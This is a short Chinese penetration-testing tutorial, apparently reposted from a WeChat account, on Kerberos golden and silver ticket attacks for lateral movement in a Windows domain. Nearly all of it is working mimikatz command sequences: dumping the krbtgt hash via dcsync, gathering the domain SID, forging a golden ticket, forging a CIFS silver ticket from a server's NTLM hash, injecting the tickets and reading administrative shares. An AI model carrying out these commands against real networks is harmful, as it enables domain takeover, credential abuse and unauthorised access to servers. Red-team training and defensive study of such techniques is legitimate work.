使用域内win2k8主机,账户DWin2k8 访问域控DC服务器,前提是拿下域控了,有了域管理员权限
mimikatz.exe "lsadump::dcsync /user:krbtgt" exit34e3b5be902f17afa0ab65d9eb9499a6
msf:hashdump
whoami查看域用户SID
除去最后数字段
whoami /allS-1-5-21-1402267840-133012738-3214165467
wmic查看全部用户SID也行
wmic useraccount get name,sid
mimikatz.exe "kerberos::golden /user:DWin2k8 /domain:test.com /sid:S-1-5-21-1402267840-133012738-3214165467 /krbtgt:34e3b5be902f17afa0ab65d9eb9499a6" exit
mimikatz.exe "kerberos::purge" exit或klist purge
然后将黄金票据注入内存,就可以有权限访问域内各项服务了
mimikatz.exe "kerberos::ptt ticket.kirbi" exit
dir \DCc$
域内win7主机,账户DWin7 访问域内Win2k8服务器,账户DWin2k8 有了对应DWin2k8服务器的hash:fb283cd583e190ef968acbe8bb7b7fc3
mimikatz.exe "kerberos::golden /user:DWin7 /service:cifs /domain:test.com /sid:S-1-5-21-1402267840-133012738-3214165467 /target:DWin2k8.test.com /rc4:fb283cd583e190ef968acbe8bb7b7fc3" exit/user是域内合法用户 /target目标服务器的全限定域名 /service运行在目标服务器上的kerberos服务,有cifs,http,mssql等 /rc4目标服务器的NTLM-hash
mimikatz.exe "kerberos::purge" exit或klist purge
mimikatz.exe "kerberos::ptt ticket.kirbi" exit
dir \DWin2k8c$
本文始发于微信公众号(XG小刚):横向移动-黄金白银票据
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论